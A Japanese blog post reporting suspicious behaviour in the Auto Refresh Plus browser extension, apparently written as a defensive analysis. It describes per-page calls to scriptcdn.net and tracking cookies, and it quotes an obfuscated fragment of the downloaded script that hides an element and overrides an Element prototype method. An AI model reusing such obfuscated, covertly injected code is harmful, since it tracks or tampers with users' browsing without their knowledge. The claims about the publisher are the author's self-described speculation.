【セキュリティレポート】Auto Refresh Plusの不審な挙動について

最近ウェブアプリの開発をしていると、開発中のページに見知らぬサードパーティCookieが付けられているのに気づきました。
詳しく調べるとそのCookieがブラウザ拡張機能Auto Refresh Plusによって発行されたものであることが分かったのですが、その動作がとても怪しいものであるため、利用者数がとても多い(40万人以上)ことを踏まえて今回この記事を書くことにしました。
結論から言うと、自分はこの拡張機能の使用を中止すべきだと思います。
※ブラウザ内に存在する限りプログラムが動き続けるので、アンインストールを行ってください。

何がやばいのか

怪しいところを探せばキリがないですが、特に以下の点は本当にやばいと思います。

無意味で怪しい通信
example.comにアクセスした際に設定されたCookie(通常は何も設定されない)

この拡張機能はユーザーが何かしらのサイトを閲覧する度に"3001.scriptcdn.net"というサイトと通信するようです。
名前的にJavaScriptファイル等を外部のCDNコンテンツ配信ネットワーク)に配置して、必要な時にそこからダウンロードして使うためのサイトと考えられるのですが、驚くべきことにこのサイトはこの拡張機能以外では使われていません。
というのも、scriptcdn.netというドメインGoogle検索しても技術系のドキュメントが一つも出てこないのです。
また、通信してダウンロードしているスクリプトファイルも拡張機能の動作に必要不可欠なものかどうか怪しいです。
というのも、ダウンロードしたスクリプトの一部は以下のようになっています。
ファイルのURL(引用元):https://3001.scriptcdn.net/code/static/1

_0x32b3['fbQbAp'] = function(_0x38a00c) {
    var _0x37db2d = _0x31b03b(_0x38a00c);
    var _0x4cf70a = [];
    for (var _0x3c7b92 = 0x3a4 + 0x18a * -0x1 + -0x21a, _0x18c768 = _0x37db2d['length']; _0x3c7b92 < _0x18c768; _0x3c7b92++) {
        _0x4cf70a += '%' + ('00' + _0x37db2d['charCodeAt'](_0x3c7b92)['toString'](0x18f3 + 0x12e0 + 0x11 * -0x293))['slice'](-(0x24d9 + -0x1bca * 0x1 + 0x14b * -0x7));
    }
    return decodeURIComponent(_0x4cf70a);
}
case '2':
    var _0x3ea808 = document['createElem' + 'ent'](_0x42e59b[_0x4c9219(-0x389, -0x2f9, -0x2fa, -0x26e)]);
    continue;
case '3':
    Element[_0x3f3a92(-0x3ae, -0x2d5, -0x195, -0x407)][_0x4c9219(-0x527, -0x539, -0x469, -0x68c) + 'd'] = _0x481455['contentWin' + _0x4c9219(-0x334, -0x486, -0x44b, -0x34e)][_0x4c9219(-0x364, -0x36b, -0x254, -0x498)]['prototype'][_0x4c9219(-0x416, -0x539, -0x527, -0x3fc) + 'd'];
    continue;
case '4':
    _0x481455[_0x4c9219(-0x478, -0x409, -0x337, -0x2e1)]['display'] = _0x42e59b['KUtJZ'];
    continue;
case '5':
    _0x481455['src'] = _0x42e59b[_0x3f3a92(-0x493, -0x4bc, -0x5ed, -0x578)];
    continue;
case '6':
    document['body']['appendChil' + 'd'](_0x481455);
    continue;

ぱっと見ですが、このファイルは実行するプログラムそのものではなく、実行するプログラムを書き出すためのプログラムのように見えます。
しかも" 'createElement' "をわざわざ" 'createElem' + 'ent' "と表記している辺り、セキュリティソフト等による検出を避けようとしているようにも見えます。
おまけにこのファイルにはアダルトサイトのドメインリストも含まれています。
これらは拡張機能の本来の目的に沿わないものであり、明らかに不自然です。
更に言ってしまえば、このサイトと通信する際に発行されるCookie(前述したもの)にはユーザーの特定に繋がりうるトークンが2つ保存されています。
ユーザーが何かしらのサイトにアクセスする度に通信していることも含めて考えると、このトークンはユーザーの追跡に使われていると考えていいと思います。
※一般的に拡張機能の動作に必要なスクリプトはインストールファイルの中に含めるので、ページ移動の度に一々ダウンロードしてくるのは不自然です。
仮に全く如何わしいことをしていなかったとしても、ページ閲覧の度に一々ダウンロードしていたらサイトの読み込みが遅くなるのでいいことはありません(自分が使っている他の拡張機能はこのような動作はしません)。
ちなみにプライバシーポリシーには「ウェブサイトやウェブサイトの利用状況などを追跡することはありません。」と書かれています。

提供者の情報が全く提供されていない

この拡張機能を提供している組織(または個人)の情報は徹底的に伏せられています。
例えばchromeウェブストアのデベロッパー情報のリンクは拡張機能の製品サイト(autorefresh.io)に繋がるだけですし、サポート窓口も製品サイト内の問い合わせフォームのみです。
プライバシーポリシー内には個人情報に関する問い合わせ用のメールアドレスがありますが、そのアドレスのドメインはautorefresh.ioであるため、具体的に誰がその問い合わせを処理するのかは分かりません。もし送ったメールに返信がない場合でも、会社名(または氏名)も電話番号も住所も分からないためどうしようもありません。
もちろんドメイン名もIPアドレスもCloudflareを使ってしっかり隠しています。

そもそも自分達で作ってない

この拡張機能のレビュー欄にこんな投稿がされていました。

あるユーザーはこの拡張機能は"盗まれたもの"であると主張。

この投稿の真偽について調査したところ、確かにこの拡張機能が出る前に同名で同じ機能を持つ拡張機能が公開されていたことが確認できました。
ソース:
https://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q13165534913
ただし上の投稿に書かれている「盗まれたもの」ということに関しては既にオリジナル版の拡張機能が公開終了していることもあり、検証できませんでした。
しかしながら、現在公開されている拡張機能を提供している組織(または個人)は拡張機能の開発をしていないこと・何かしらの理由で既に公開されていた拡張機能を自分達で再度リリースしたことは事実です。
無料で全ての機能が利用でき、収益が一切発生しないようなものをわざわざ再度リリースしたのには、何か特別な事情があったと考えざるを得ません。
オリジナル版のURL:
https://chrome.google.com/webstore/detail/auto-refresh-plus/ohfjpkccecpdfkpmfocndhepolhljfhg
現在公開されている拡張機能のURL:
https://chrome.google.com/webstore/detail/auto-refresh-plus-page-mo/hgeljhfekpckiiplhkigfehkdpldcggm

取るべき対応

この拡張機能を使っている人はすぐにでもアンインストールすることをおすすめします。
それができない場合はせめて「シークレットモードでの実行を許可する」をオフにしてください。
また、技術者の方は拡張機能の動作の検証にご協力ください。
一度動作を検証して頂き、この記事に書いたのと同様の挙動が見られた場合はストアへの報告をお願いします。
※自分はChrome ウェブストアとMicrosoft Edge アドオンストアに報告しておきました。

注意事項

・この記事には独自研究が含まれています。記事内の情報は自身の責任で利用してください。
・この記事の内容はあくまでも調査に基づく推測であり、絶対にそうであると言いきっているわけではありません。また、この記事に第三者の名誉を傷つけたり誹謗中傷する意図はありません。また、不利益を与える意図もありません。

最後に

色々と説明していたら長い記事になってしまいました。
最後までお読み頂きありがとうございました。